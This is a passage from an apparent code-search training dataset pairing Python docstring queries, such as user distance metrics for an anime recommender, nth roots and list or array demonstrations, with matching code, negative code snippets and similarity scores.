return sqrt(sum(pow(anime.neighbor_users[user1] - anime.neighbor_users[user2], 2)
for anime in common_animes))
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def EuclideanDistance( self, a, b ):\n return sqrt( self.EuclideanDistanceSq(a,b) )",
"def euclidean_distance(self,):\n return sqrt(pow((self.pose1.x - self.pose2.x), 2) +\n pow((self.pose1.y - self.pose2.y), 2))",
"def __dist(u, v):\n return spatial.distance.euclidean(u, v)",
"def get_distance(user_id1: str, user_id2: str) -> float:\n features1 = get_feature_vector(user_id1)\n features2 = get_feature_vector(user_id2)\n pass",
"def vertex_distance(self, v1, v2):\n return utils.real_distance(self.node_locations[v1], self.node_locations[v2])",
"def euclidean_distance(x1, y1, x2, y2):\n distance = math.sqrt(((x2 - x1) ** 2) + ((y2 - y1) ** 2))\n return distance",
"def euclidean_dist_vec(y1, x1, y2, x2):\n\n # euclid's formula\n distance = ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** 0.5\n return distance",
"def euclidean_distance(x1, x2):\n return (x2[0] - x1[0])**2 + (x2[1] - x1[1])**2",
"def cosine_distance(user1: User, user2: User) -> float:\r\n common_animes = set.intersection(set(user1.neighbor_anime.keys()),\r\n set(user2.neighbor_anime.keys()))\r\n if len(common_animes) == 0:\r\n return 1\r\n numerator = sum(anime.neighbor_users[user1] * anime.neighbor_users[user2]\r\n for anime in common_animes)\r\n denominator = _square_rooted(user1, common_animes) * _square_rooted(user2, common_animes)\r\n try:\r\n return 1 - (numerator / denominator)\r\n except ZeroDivisionError:\r\n print(user1.username)\r\n for anime in common_animes:\r\n print(anime.neighbor_users[user1])\r\n print(user2.username)\r\n for anime in common_animes:\r\n print(anime.neighbor_users[user2])\r\n return 1",
"def euclidean_distance(a, b):\n return np.linalg.norm(a - b)",
"def euclideanDistance(x1,y1,x2,y2):\n distance = math.sqrt(abs(math.pow((x2-x1),2)) + abs(math.pow((y2-y1),2)))\n return distance",
"def euclidean(self, other):\n return linalg.norm([self.x - other.x, self.y - other.y])",
"def euclidean(p1, p2):\n return p1.distance(p2)",
"def euclidian_distance(x1, y1, x2, y2):\n distance = sqrt(pow((x1-x2), 2)+(pow((y1-y2), 2)))\n return distance",
"def _euclidian_distance(self, x1, x2):\n a= x1-x2\n a2 = a**2\n b = np.sum(a2, axis=1)\n c = np.sqrt(b)\n return c",
"def euclidean_distance(x1: np.ndarray, x2: np.ndarray) -> float:\n return np.sqrt(np.square(x1 - x2).sum())",
"def euclidean_distance(x1, x2):\n return np.sqrt(np.sum(np.square(np.subtract(x1, x2))))",
"def euclidean_distance(x, y):\n return sqrt(sum(pow(a - b, 2) for a, b in zip(x, y)))",
"def euclidean_distance(point_one, point_two):\n return np.linalg.norm(point_one-point_two)",
"def euclidean_distance(x, y):\n x1, y1 = x\n x2, y2 = y\n return sqrt((x1 - x2)**2 + (y1 - y2)**2)",
"def euclidean_distance(vec1, vec2):\n return numpy.linalg.norm(vec1 - vec2)",
"def compute_distance(node1, node2):\n return np.linalg.norm(node1 - node2)",
"def get_euclidean_distance(self, x_coord_1, x_coord_2, y_coord_1, y_coord_2):\r\n\r\n return math.sqrt(((x_coord_1 - x_coord_2) ** 2) + \\\r\n ((y_coord_1 - y_coord_2) ** 2))",
"def euclidean_distance(x1, x2):\n return np.sqrt(np.sum(np.power(x1 - x2, 2)))",
"def euclidean_distance(x: np.ndarray, y: np.ndarray) -> float:\n\n distance = np.linalg.norm(x - y)\n\n return distance",
"def euclidean_distance(a, b):\n return sqrt((a[0] - b[0])**2 + (a[1] - b[1])**2)",
"def compute_distance (uVector, uOther):\n ## since each element can be either 0 or 1,\n ## no need for square roots and pow\n d = 0\n for i in range (len(uVector)):\n d = d + math.pow((int(uVector [i]) - int(uOther [i])), 2)\n\n return d",
"def compute_euclidean_dist(vec1, vec2):\r\n assert len(vec1) == len(vec2)\r\n vec1 = np.array(vec1)\r\n vec2 = np.array(vec2)\r\n return np.sqrt(np.sum(np.square(vec2 - vec1)))",
"def eucl_dist(x_0, y_0, x_1, y_1):\n return sqrt((x_1 - x_0)**2 + (y_1 - y_0)**2)",
"def euclidean_distance(x: np.ndarray, y: np.ndarray) -> float:\n distance_vector: np.ndarray = x - y\n distance = compute_norm(distance_vector)\n return distance"
] |
[
"0.6963895",
"0.69466466",
"0.68903524",
"0.6880266",
"0.686357",
"0.6833224",
"0.6806497",
"0.6797395",
"0.6784993",
"0.6771039",
"0.6765979",
"0.67626446",
"0.67287564",
"0.671541",
"0.6711146",
"0.67072904",
"0.66899544",
"0.667745",
"0.6650605",
"0.6641603",
"0.6625499",
"0.6621939",
"0.6612432",
"0.66083455",
"0.66056526",
"0.6570237",
"0.6560911",
"0.6549321",
"0.65190166",
"0.6486659"
] |
0.7759146
|
0
|
Return the manhattan distance between two User vertices
|
def manhattan_distance(user1: User, user2: User) -> float:
common_animes = set.intersection(set(user1.neighbor_anime.keys()),
set(user2.neighbor_anime.keys()))
return sum(abs(anime.neighbor_users[user1] - anime.neighbor_users[user2])
for anime in common_animes)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def manhattan_distance(x, y):\n return abs(x) + abs(y)",
"def get_manhattan_distance(coord_a, coord_b):\n return abs(coord_a.x - coord_b.x) + abs(coord_a.y - coord_b.y)",
"def manhattan_distance(x, y):\n return sum(abs(a - b) for a, b in zip(x, y))",
"def manhattan_distance(self):\n x, y = self.start\n other_x, other_y = self.x, self.y\n print(abs(x - other_x) + abs(y - other_y))",
"def distManhattan(p1,p2):\n (x1,y1)=p1\n (x2,y2)=p2\n return abs(x1-x2)+abs(y1-y2)",
"def get_manhattan_dist(row1, col1, row2, col2):\n distHoriz = abs(row1 - row2)\n distVert = abs(col1 - col2)\n dist = distHoriz + distVert\n return dist",
"def manhattan_distance(origin, destination):\n return abs(destination.row - origin.row) + \\\n abs(destination.column - origin.column)",
"def manhattan_dist(c1, c2):\n return abs(c1[0] - c2[0]) + abs(c1[1] - c2[1]) + abs(c1[2] - c2[2])",
"def manhattan(self, u, v):\n abs_x = abs(self.G.nodes[u][\"x\"] - self.G.nodes[v][\"x\"])\n abs_y = abs(self.G.nodes[u][\"y\"] - self.G.nodes[v][\"y\"])\n return abs_x + abs_y",
"def manhattan_distance(a: ArrayLike, b: ArrayLike) -> NDArrayFloat:\n\n return as_float(\n np.sum(np.abs(as_float_array(a) - as_float_array(b)), axis=-1)\n )",
"def calculate_manhattan(node_a, node_b):\n return (abs(node_a.x - node_b.x) + abs(node_a.y - node_b.y))",
"def manhattan_distance_between(start, destination):\n return abs(destination.x - start.x) + abs(destination.y - start.y)",
"def return_manhattan_distance(coord1, coord2):\n x1, y1 = coord1\n x2, y2 = coord2\n\n return float(abs(x2-x1) + abs(y2-y1))",
"def manhattan_distance(self):\n return calculate_manhattan_distance(self.location, self.target_location)",
"def manhattan(vector1, vector2):\n distance = 0\n # total = 0\n n = len(vector1)\n # print('vector1 => ', vector1)\n # print('vector2 => ', vector2)\n\n # print('vector1[0] => ', vector1[0])\n # print('vector1[1] => ', vector1[1])\n \n for i in range(n):\n # print('vector1[i] => ', vector1[i])\n # print('vector2[i] => ', vector2[i])\n distance += abs(vector1[i] - vector2[i])\n return distance",
"def _manhattan(pos1, pos2):\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))",
"def calculate_manhattan_dist(self):\n return self._current_cost + abs(self._current_loc.get_row() - self._goal_loc.get_row()) +\\\n abs(self._current_loc.get_column() - self._goal_loc.get_column())",
"def manhattan(a, b):\n return abs(a[0] - b[0]) + abs(a[1] - b[1])",
"def minkowski_distance(user1: User, user2: User) -> float:\r\n # predefined p_value\r\n p_value = 3\r\n common_animes = set.intersection(set(user1.neighbor_anime.keys()),\r\n set(user2.neighbor_anime.keys()))\r\n return _nth_root(sum(pow(abs(anime.neighbor_users[user1] - anime.neighbor_users[user2]),\r\n p_value) for anime in common_animes), p_value)",
"def manhattanDistance(loc1, loc2):\n # BEGIN_YOUR_CODE (our solution is 1 line of code, but don't worry if you deviate from this)\n return(sum(tuple(abs(i-j) for i,j in zip(loc1,loc2))))\n # END_YOUR_CODE",
"def manhattan(x1, y1, x2, y2):\n return abs(x1 - x2) + abs(y1 - y2)",
"def calculate_manhattan_dist(state):",
"def manhattan(x, y):\n md = np.sum(abs(x-y))\n # print md\n return md",
"def manhattan(self):\n distance = 0\n for i in range(3):\n for j in range(3):\n if self.plateau[i][j] != 0:\n x, y = divmod(self.plateau[i][j]-1, 3)\n distance += abs(x - i) + abs(y - j)\n return distance",
"def manhattanDis(self, pos1, pos2):\n (x1, y1) = pos1\n (x2, y2) = pos2\n return abs(x1-x2) + abs(y1-y2)",
"def manhattanDistance(loc1, loc2):\n # BEGIN_YOUR_ANSWER (our solution is 1 lines of code, but don't worry if you deviate from this)\n return sum([abs(loc2[i]-l1) for i, l1 in enumerate(loc1)])\n # END_YOUR_ANSWER",
"def manhattan(x,y):\n\tassert (isinstance(x, BayesNet) and isinstance(y, BayesNet)), 'Must pass in BayesNet objects.'\n\tassert (x==y), 'Passed-in BayesNet objects are not structurally equal.'\n\n\tdistance = np.sum( np.abs( x.flat_cpt() - y.flat_cpt() ) )\n\treturn distance",
"def manhattan_distance(self):\n dist = 0\n for target, tile in zip(self.winCdt[:-1], self.tiles[:-1]):\n dist += abs(target[0] - tile[0]) + abs(target[1] - tile[1])\n return dist",
"def manhattan_distances(X, Y):\r\n D = np.zeros((X.shape[0],Y.shape[0]))\r\n \r\n for X_idx in range(X.shape[0]):\r\n for Y_idx in range(Y.shape[0]): \r\n \r\n D[X_idx,Y_idx] = np.sum(np.abs(X[X_idx,:] - Y[Y_idx,:]))\r\n \r\n return D",
"def heuristic_manhattan_distance(self):\n distance = 0\n\n for i in range(self.PUZZLE_NUM_ROWS):\n for j in range(self.PUZZLE_NUM_COLUMNS):\n i1, j1 = self._get_coordinates(self.position[i][j], self.PUZZLE_END_POSITION)\n distance += abs(i - i1) + abs(j - j1)\n\n return distance"
] |
[
"0.75152785",
"0.74619585",
"0.74610585",
"0.73415506",
"0.7291795",
"0.7279972",
"0.72796065",
"0.7268842",
"0.7196731",
"0.719276",
"0.7189901",
"0.71806836",
"0.71418595",
"0.71008533",
"0.70642215",
"0.7021635",
"0.7007767",
"0.6989743",
"0.69610256",
"0.693819",
"0.69203496",
"0.6914366",
"0.6908984",
"0.6825278",
"0.67967075",
"0.67909133",
"0.6789061",
"0.6776867",
"0.67662543",
"0.6762081"
] |
0.82790244
|
0
|
Return the n_root of an value.
|
def _nth_root(value, n_root) -> float:
root_value = 1 / float(n_root)
return Decimal(value) ** Decimal(root_value)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _nth_root(value, n_root):\n return value ** (1 / n_root)",
"def n_root_of_x(n, x):\n if n==0:\n return 1\n \n return 1 if n==0 else x**(1.0/n)",
"def nth_root(n):\n def actual_root(x):\n \"\"\"Returns the nth root of x\"\"\"\n root = x ** (1/n)\n\tprint(x)\n return root\n return actual_root",
"def nthRoot(x,n):\n return op.pow(x,1/n)",
"def actual_root(x):\n root = x ** (1/n)\n\tprint(x)\n return root",
"def integer_root(n,k):\n # from https://stackoverflow.com/questions/15978781/how-to-find-integer-nth-roots/15979957:\n # Newton's method to find kth root of n\n u, s = n, n+1\n while u < s:\n s = u\n t = (k-1) * s + n // pow(s, k-1)\n u = t // k\n return s",
"def nth_root_of_a(n, a):\n return find_zero(lambda x: pow(x, n) - a, lambda x: n * pow(x, n-1))",
"def sroot(n):\n\n return int(n ** 0.5) == n ** 0.5",
"def n_value(self) -> int:\n return self.my_n",
"def square_root(value):\n # Init\n root = 1.0 # Provisional square root\n difference = (root * root) - value # How far off is our provisional root\n\n ##--- Loop until the provisional root is close enough to the actual root ----###\n while difference > 0.00000001 or difference < -0.00000001:\n root = (root + (value / root)) / 2 # Compute new provisional root\n difference = (root * root) - value # # How far off is our current approximation?\n \n return root",
"def _root():\n return 0",
"def find_root_1(x, n, p=0.001):\n step = p / 10\n guess = step\n while abs(guess ** n - x) > p:\n guess += step\n return round(guess, 3)",
"def root_0(a):\n return 0",
"def cube_root(val):\n return val ** (1 / 3)",
"def nN(self):\n return int(self.vnN.prod())",
"def find_root_2(x, n, p=0.001):\n step = p / 10\n left, right = 0, x\n while True:\n guess = (left + right) / 2\n result = guess ** n\n if abs(result - x) <= p:\n break\n elif result > x + p:\n right = guess - step\n else:\n left = guess + step\n\n if round(guess) ** n == x:\n return round(guess)\n return round(guess, 3)",
"def count_value(tree,val):\r\n if (tree==None):\r\n return 0\r\n elif(value(tree)==val):\r\n return 1+count_value(left(tree), val)+count_value(right(tree), val)\r\n else:\r\n return count_value(left(tree), val)+count_value(right(tree), val)",
"def find(self, value):\n if self.value is None:\n raise BinaryTreeValueError(\"Value {} not in tree\")\n\n if self.value == value:\n return self.left_length\n\n elif value < self.value:\n # Value is in left side of tree\n return self.left.find(value)\n\n else:\n # Value is in right side of tree\n return self.right.find(value) + self.left_length + 1",
"def kth_root_modulo(a, k, n):\n # x = g^y => x^k = (g^k)^y = a\n # => y = log_{g^k} a (mod n)\n g = primitive_root(n)\n gk = powmod(g, k, n)\n y = log_modulo(gk, a, n)\n return powmod(g, y, n)",
"def getN(self)->int:\n return self.n",
"def num_tree(self):\n if self.handle is None:\n raise AttributeError('Model not loaded yet')\n out = ctypes.c_size_t()\n _check_call(_LIB.TreeliteQueryNumTree(self.handle, ctypes.byref(out)))\n return out.value",
"def n():\n # For documentation purposes",
"def dist_from_root(self, index):\n if index == 0:\n return 0\n return self.dist_from_root(self.parent(index)) + 1",
"def rank(self, value):\n i = 0\n n = len(self._tree)\n rank = 0\n count = 0\n while i < n:\n cur = self._tree[i]\n if value < cur:\n i = 2 * i + 1\n continue\n elif value > cur:\n rank += self._counts[i]\n # subtract off the right tree if exists\n nexti = 2 * i + 2\n if nexti < n:\n rank -= self._counts[nexti]\n i = nexti\n continue\n else:\n return (rank, count)\n else: # value == cur\n count = self._counts[i]\n lefti = 2 * i + 1\n if lefti < n:\n nleft = self._counts[lefti]\n count -= nleft\n rank += nleft\n righti = lefti + 1\n if righti < n:\n count -= self._counts[righti]\n return (rank, count)\n return (rank, count)",
"def rank(self, value):\n i = 0\n n = len(self._tree)\n rank = 0\n count = 0\n while i < n:\n cur = self._tree[i]\n if value < cur:\n i = 2 * i + 1\n continue\n elif value > cur:\n rank += self._counts[i]\n # subtract off the right tree if exists\n nexti = 2 * i + 2\n if nexti < n:\n rank -= self._counts[nexti]\n i = nexti\n continue\n else:\n return (rank, count)\n else: # value == cur\n count = self._counts[i]\n lefti = 2 * i + 1\n if lefti < n:\n nleft = self._counts[lefti]\n count -= nleft\n rank += nleft\n righti = lefti + 1\n if righti < n:\n count -= self._counts[righti]\n return (rank, count)\n return (rank, count)",
"def simple_root(self, i):",
"def primitive_root(n):\n if n == 2:\n return 1\n phi = euler_phi(n)\n phi_divisors = factorize(phi)\n for g in range(2, n + 1):\n if gcd(g, n) != 1:\n continue\n for d, _ in phi_divisors:\n if powmod(g, phi // d, n) == 1:\n # g can not be a generator\n break\n else:\n return g\n\n # generator not found\n # Gauss theorem conditions did not met\n return None",
"def scale_root(self) -> int:\r\n ...",
"def fn(node):\n nonlocal ans\n if not node: return 0 \n sm = fn(node.left) + fn(node.right)\n if sm == node.val: ans += 1\n return sm + node.val",
"def is_root(self, n):\n return n == self._root"
] |
[
"0.79498124",
"0.713204",
"0.69784826",
"0.6963353",
"0.6950171",
"0.65510285",
"0.64180315",
"0.62910885",
"0.6132244",
"0.60917604",
"0.6063739",
"0.5974272",
"0.5893334",
"0.58790827",
"0.57461566",
"0.5711435",
"0.56959045",
"0.5678474",
"0.56771743",
"0.56726843",
"0.5657271",
"0.5630658",
"0.55882186",
"0.5587705",
"0.5587705",
"0.55382055",
"0.553343",
"0.55259424",
"0.5506445",
"0.5502789"
] |
0.75039595
|
1
|
Return the square rooted value of the sum of squares of user review scores.
|
def _square_rooted(user: User, animes: set[Anime]) -> float:
return sqrt(sum([anime.neighbor_users[user] * anime.neighbor_users[user]
for anime in animes]))
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def calc_rmse(self, data):\n res= data.score- data[['userid','itemid']].apply(lambda row:self.calc_score(row[0], row[1]),axis=1)\n res=[el**2 for el in np.array(res)]\n return np.sqrt(np.sum(res)/data.shape[0])",
"def root_mean_square_value( values ):\n return ma.sqrt(mean_square_value( values ))",
"def calc_score(self, user_id, item_id): \n p = np.dot(self.U[user_id], self.V[item_id])\n if self.trunc_score_rule==None:pass\n else: p=self.trunc_score_rule(p)\n \n return p",
"def get_final_score(self, user):\n\n iq_subject_score = self.get_overall_score(user=user)\n\n try:\n speech_score = UserQuizMark.objects.filter(user=user, quiz=self.get_object('speech_training')).latest(\n 'timestamp').marks\n drawing_score = UserQuizMark.objects.filter(user=user, quiz=self.get_object('drawing')).latet(\n 'timestamp').marks\n except UserQuizMark.DoesNotExist:\n raise Http404\n\n avg_speech_drawing_score = speech_score + drawing_score\n\n return (iq_subject_score + avg_speech_drawing_score) / 2",
"def get_mean_score(rating_scores):\n return sum(rating_scores) / len(rating_scores)",
"def root_mean_square_error(y, y_pred, w):\n return np.sqrt(np.average(((y_pred - y) ** 2), weights=w))",
"def _calculate_score(predictions: np.ndarray, correct: np.ndarray) -> float:\n return np.sqrt(np.sum(np.square(np.log(predictions + 1) - np.log(correct + 1))) / len(correct))",
"def _root_sum_of_squares(list):\n return sum((el ** 2 for el in list)) ** (0.5)",
"def sum_of_squares(x):\r\n return dot(x, x)",
"def rootsumsquares(a):\n\treturn np.sqrt(np.sum(np.power(a,2)))",
"def _square_rooted(x):\n return sqrt(sum([(a * a) for a in x]))",
"def rSquare(estimations, measureds):\n SEE = (( np.array(measureds) - np.array(estimations) )**2 ).sum()\n mMean = (np.array(measureds)).sum() / float(len(measureds))\n dErr = ((mMean - measureds)).sum()\n \n return 1 - (SEE / dErr)",
"def sumsquares(self):\n return np.dot((self.demeaned ** 2).T, self.weights)",
"def RMSE(ratings, range):\n\n return sqrt(MSE(ratings, range))",
"def getScore(self):\n return sum(self.field)",
"def getScores(self, w1, w2, w3):\r\n Fw = 2.26 * 3\r\n score = round((float(w1) * float(w2) * float(w3)) ** Fw, 6) # Keep six decimal places\r\n return score",
"def root_mean_squared_error(y_true, y_pred):\n return sm.mean_squared_error(y_true, y_pred)**0.5",
"def _rsq(self):\n return self._ss_reg / self._ss_tot",
"def root_mean_square(xs):\n squares = xs ** 2\n sum_squares = np.sum(squares)\n\n rms = math.sqrt((len(xs) ** -1) * sum_squares)\n return rms",
"def root_sum_of_squares(data, dim=0):\n return torch.sqrt((data ** 2).sum(dim))",
"def root_sum_of_squares(data, dim=0):\n return torch.sqrt((data ** 2).sum(dim))",
"def score(self):\n result = 1\n one_node = self.cups.locate_node(1)\n a = one_node.next()\n b = a.next()\n\n result = a.value * b.value\n\n return result",
"def _compute_scores(self, triples):\n # compute scores as sum(s * p * o)\n scores = tf.reduce_sum(triples[0] * triples[1] * triples[2], 1)\n return scores",
"def total_sum_of_squares(y: np.ndarray) -> float:\n return np.sum(np.square(y - np.linalg.norm(y)))",
"def calculate_score(player_cards):\n score = sum(player_cards)\n return score",
"def sum_of_squares(v: Vector) -> float:\n return dot(v,v)",
"def get_real_rating(self):\n if not (self.votes and self.score):\n return 0\n return float(self.score)/self.votes",
"def get_fisher_rao_norm_squared(self, sess, x_test, y_test):\n pred_np = self.get_prediction(sess, x_test)\n dl_df_np = self.get_dl_df(sess, x_test, y_test)\n prod = pred_np * dl_df_np\n inner_prod_vector = np.sum(prod, axis = 0)\n inner_prod_squared = inner_prod_vector * inner_prod_vector\n return np.mean(inner_prod_squared)",
"def sum_of_squares(v: Vector) -> float:\n return dot(v, v)",
"def sum_of_squares(v: Vector) -> float:\n return dot(v, v)"
] |
[
"0.67789346",
"0.6725351",
"0.67098415",
"0.6668904",
"0.66526634",
"0.650096",
"0.64910007",
"0.6392752",
"0.6374066",
"0.63549167",
"0.63388354",
"0.6285989",
"0.6280445",
"0.6243268",
"0.6229393",
"0.6226667",
"0.6225889",
"0.6224023",
"0.61846817",
"0.6182643",
"0.6182643",
"0.6176689",
"0.61630267",
"0.61527854",
"0.61495084",
"0.6145002",
"0.6144133",
"0.61435187",
"0.6137258",
"0.6137258"
] |
0.6883933
|
0
|
Using append() insert() remove() pop() extend() count() index() reverse() len() ... Also, "in" and "not in" operators can be used to search lists for the occurrence of a given element.
|
def demonstrate_list_methods():
john = ['John Lennon', 1940, True]
# john.append('Liverpool')
# print(john)
print(john.append('Liverpool'))
print(john)
john.insert(2, 'The Beatles')
print(john)
john.remove(1940)
print(john)
del john[True]
print(john)
john.extend(['Paul McCartney', 'The Beatles'])
print(john)
john.append('Liverpool')
print(john)
print(john.count('Liverpool'))
print(john.index('Liverpool'))
john.reverse()
print(john)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def __contains__(self, elem):\n return elem in list(self)",
"def test_contains(self):\n s = djset()\n s.add([1, 2, 3])\n s.add([4, 5, 6])\n self.assertTrue(2 in s)\n self.assertTrue(5 in s)",
"def contains(self, other):",
"def contains(self, element):\n pass",
"def in_list(value, arg):\r\n return value in arg",
"def __contains__(self, i):\n return i in self._ar",
"def _listContains(self, l, entry):\n for i in range(0, len(l)):\n if l[i] == entry:\n return True\n return False",
"def __contains__(self, item):",
"def contains(self, *args):\n pass",
"def test_in_list(self):\n\n # get available ids\n ids = list(DQ(\"(b.id) Book b\").tuples())\n ids = [id[0] for id in ids]\n\n # take just three of them\n c = {\"ids\": ids[:3]}\n dq = DQ(\"(b.id, b.name) Book{b.id in '$(ids)'} b\")\n r = list(dq.context(c).dicts())\n\n # make sure we got three of them\n self.assertEqual(len(r), 3)",
"def testContains(self):\n\n N = randint(20,100)\n for i in xrange(N):\n self.s.insert(i,True)\n N-=(i in self.s)\n\n self.assertEqual(N,0)",
"def isin(hi):\n return finder.search(hi)",
"def contains(list, e):\r\n for elem in list:\r\n if elem == e:\r\n return True\r\n return False",
"def all_in_set(the_set, the_list):\n return True",
"def __contains__(self, item):\n # type(Any) -> bool\n return list.__contains__(self, self.ref(item))",
"def __contains__(self,x):\n return 0 <= x < len(self)",
"def contains(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads\r\n return False",
"def contains(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads\r\n return False",
"def test_linked_list_includes_all_input_elements():\n a = [5, 6, 7, 8]\n aa = LinkedList([])\n aa.insert(a)\n for i in a:\n assert aa.includes(i) is True\n assert len(aa) == len(a)",
"def add_this_many(x, el, s):\r\n count = 0\r\n for i in range(len(s)):\r\n if s[i] == x:\r\n count +=1\r\n while count > 0:\r\n s.append(el)\r\n count -= 1",
"def contains(self, *args):\n return _libsbml.IdList_contains(self, *args)",
"def contains(collection, target):\n\treturn target in collection",
"def __contains__(self, v):\n for i in self:\n if v in i:\n return True\n False",
"def occurrences(lstObjects, objVal):\n lstNew = []\n\n for itm in lstObjects:\n if itm == objVal:\n lstNew.append(itm)\n\n return lstNew;",
"def sublist_in(lst, sublst):\n for i in sublst:\n if i not in lst:\n return False\n return True",
"def __contains__(self, item):\n pass",
"def insert_items(lst, entry, elem):\n# index = 0\n# for index in range(len(lst)):\n# if lst[index] == entry:\n# lst.insert(index+1, elem)\n# if entry == elem:\n# index += 1\n index = 0 \n while index < len(lst):\n if lst[index] == entry:\n lst.insert(index+1, elem)\n if entry == elem:\n index += 1\n index += 1\n return lst",
"def exist(self,list,a):\r\n\t\ti = 0\r\n\t\tfor elem in list:\r\n\t\t\tif (elem == a):\r\n\t\t\t\ti=i+1\r\n\t\tif (i>0):\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False",
"def contains(base, sub_list):\n\n return set(base) & set(sub_list) == set(sub_list)",
"def __contains__(self, x):\n return x in (v for v, _ in self)"
] |
[
"0.60959727",
"0.5751839",
"0.5720554",
"0.55933017",
"0.5549648",
"0.54963696",
"0.5443714",
"0.5430824",
"0.5384499",
"0.5320489",
"0.5310426",
"0.5304248",
"0.5287764",
"0.52701306",
"0.5247795",
"0.52417976",
"0.52148986",
"0.52148986",
"0.516982",
"0.51644474",
"0.51314145",
"0.5113813",
"0.50995606",
"0.50989056",
"0.5089158",
"0.508865",
"0.5083433",
"0.50682217",
"0.5066977",
"0.50645643"
] |
0.5912757
|
1
|
Using array.array() to build listbased numeric arrays. Demonstrating that lists and arrays are different types.
|
def demonstrate_arrays():
from array import array
a = array('i', [4, 2, 8, 9])
print(a)
print(type(a))
l = [4, 2, 8, 9]
print(l)
print(type(l))
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def numarray(a: list) -> list[float]:\n return [float(aa) for aa in a]",
"def basic_array_creation():\n print('From normal creation')\n arr: pa.Array = pa.array([1, 2, 3, 4, 5], type=pa.int8())\n print(arr)\n\n print('From pandas series')\n arr: pa.Array = pa.Array.from_pandas(pd.Series([1, 2, 3, 4, 5]))\n print(arr)",
"def listarNum(num):\r\n num=str(num)\r\n list_num=np.array([])\r\n for n in num:\r\n n=float(n)\r\n list_num=np.append(list_num, n)\r\n return list_num",
"def n(l):\n return np.array(l,dtype=object)",
"def type_array():\n return []",
"def test_expr_list_array_constructor():\n fcode = \"ACOS(-1.0), SIN(1.0), 1.0+3.0\"\n ast = Fortran2003.Ac_Spec(fcode)\n assert isinstance(ast, Fortran2003.Ac_Value_List)",
"def test_asarraylike_list():\n lst = [1, 2, 3, 4]\n result = util.asarraylike(lst)\n assert isinstance(result, np.ndarray)\n assert np.array_equal(result, lst)",
"def decode(lst, typecode ):\n a = array.array( typecode )\n for n,c in lst: \n a.extend( array.array( typecode, (c,) * n ) )\n return a",
"def make_fp_array(fp_list, shape, name, pos):\n# XXX For some reason I'm unable to track down, sphinx was unhappy about the indentation in the\n# results of the first test in this docstring, so I reworked it to print the two rows of the array\n# separately, and now it's happy again.\n if not shape:\n # note: SyntaxError is in yappsrt.py and gets globbed into our\n # namespace, thus shadowing Python's builtin!\n raise SyntaxError(pos, \"expected a non-empty shape sequence for field %r, got %r\" % (name, shape,))\n from operator import mul\n len_needed = reduce(mul, shape)\n if len_needed != len(fp_list):\n # note: SyntaxError is in yappsrt.py and gets globbed into our\n # namespace, thus shadowing Python's builtin!\n raise SyntaxError(pos, \"expected %d values for field %r, got %d\" % (len_needed, name, len(fp_list)))\n a = array(fp_list, dtype = float)\n a.shape = shape\n return a",
"def to_numpy(a: List[tvm.nd.NDArray]) -> List[np.ndarray]:\n assert a is not None, \"Empty result cannot be converted to numpy\"\n return [x.numpy() for x in a]",
"def as_array(value):\n\tif not isinstance(value, list):\n\t\treturn [value]\n\treturn value",
"def test_cast_list(self):\n dim = Real(\"yolo\", \"uniform\", -3, 4)\n assert dim.cast([\"1\", \"2\"]) == [1.0, 2.0]",
"def array(self):",
"def listoflistToarray(l):\n max_dim=max([len(c) for c in l])\n all_array=[np.pad(c,(0,max_dim-len(c)),\"constant\",constant_values=(0,0)) for c in l]\n return np.array(all_array)",
"def makelist(input):\n if isinstance(input, list) or isinstance(input, np.array):\n output = input\n else:\n output = [input]\n return output",
"def test_make_np_iterable_list(val):\n val_rec = uc._make_np_iterable(val)\n\n assert isinstance(val_rec, np.ndarray)\n assert len(val_rec) == len(val)",
"def create_array( n ):",
"def array (self, length, width):\n\t\treturn [[0 for i in range(width)] for j in range(length)] #List comprehensions (Works like two for loops)",
"def init_one_d_array(len, val):\n return [val for i in range(len)]",
"def __init__(self, initializing_list, typecode) :\r\n global TypeRanges, NumericToArray\r\n array_typecode = NumericToArray[typecode][0]\r\n self.numeric_typecode = typecode\r\n self.impl = array.array(array_typecode)\r\n self.complex = (typecode=='F' or typecode=='D')\r\n for x in initializing_list :\r\n self.append(x)",
"def c_array(ctype, values):\n\n arr = (ctype*len(values))()\n arr[:] = values\n return arr",
"def number_array(cls, scale, num, space, space_series, num_series, \n origin, subsampling, rotation=0, values=None,\n thin=True, text_width=None):\n if values is None:\n nums = range(num)\n else:\n nums = [values[i%len(values)] for i in range(num)] \n \n all_numbers = []\n for i in range(num_series):\n for j in range(num):\n xpos = origin[0]+j*space+i*(space*num+space_series)\n if np.mod(j,subsampling) ==0:\n if thin:\n cur_num = Feature.define_text([xpos,origin[1]],str(nums[j]), scale, rotation, text_width=text_width).coord\n else:\n cur_num = Feature.numbering(nums[j], scale, [xpos,origin[1]],rotation).coord\n for x in cur_num:\n all_numbers.append(x)\n all_numbers_obj = cls()\n all_numbers_obj.coord = all_numbers\n if thin:\n all_numbers_obj.open = True\n all_numbers_obj.text_width = text_width\n return all_numbers_obj",
"def test_cast_array(self):\n dim = Real(\"yolo\", \"uniform\", -3, 4)\n assert np.all(dim.cast(np.array([\"1\", \"2\"])) == np.array([1.0, 2.0]))",
"def m_numeric_array(self, value):\n return '<numeric_array id=\"%s\" encoding=\"base64\">%s</numeric_array>' % \\\n (self.register(value), Numeric.dumps(value).encode('base64'))",
"def test_array_uplift(parser):\n doc = parser.parse(b'[0, 1, 2, 3, 4, 5]')\n assert isinstance(doc, simdjson.Array)\n\n assert doc.as_list() == [0, 1, 2, 3, 4, 5]\n assert isinstance(doc.as_list(), list)",
"def getDoubleArray2D(self) -> typing.List[typing.List[float]]:\n ...",
"def to_ndarray(item):\n \n return type(item), sp.array(item, sp.float64, ndmin=1)",
